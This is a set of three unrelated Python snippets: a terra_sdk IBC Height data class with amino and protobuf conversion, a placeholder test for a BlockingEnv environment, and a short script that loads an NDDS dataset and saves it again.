"""ibc client module data objects.""" from __future__ import annotations import attr from terra_proto.ibc.core.client.v1 import Height as Height_pb from terra_sdk.util.json import JSONSerializable __all__ = ["Height"] @attr.s class Height(JSONSerializable): revision_number: int = attr.ib(default=0, converter=int) revision_height: int = attr.ib(default=0, converter=int) def to_amino(self) -> dict: return { "revision_number": self.revision_number, "revision_height": self.revision_height } @classmethod def from_data(cls, data: dict) -> Height: return cls( revision_number=data["revision_number"], revision_height=data["revision_height"], ) @classmethod def from_proto(cls, proto: Height_pb) -> Height: return cls( revision_number=proto.revision_number, revision_height=proto.revision_height, ) def to_proto(self) -> Height_pb: return Height_pb( revision_number=self.revision_number, revision_height=self.revision_height )
nilq/baby-python
python
import numpy as np import scipy as scp from numpy.linalg import norm ############################################# # Add the one-folder-up-path import os import sys sys.path.append(os.path.join(os.path.dirname(__file__), '../')) ############################################# from envs.blocking_env import BlockingEnv def test_create_environment(): x = 5 assert x == 5, 'test failed' # # env_info = { # 'agent_count_red': 4, # 'agent_count_blue': 4 # } # env = BlockingEnv(env_info)
nilq/baby-python
python
from annotation_utils.ndds.structs import NDDS_Dataset dataset = NDDS_Dataset.load_from_dir('/home/clayton/workspace/prj/data_keep/data/ndds/measure_kume_map3_1_200', show_pbar=True) dataset.save_to_dir('save_test', show_pbar=True)
nilq/baby-python
python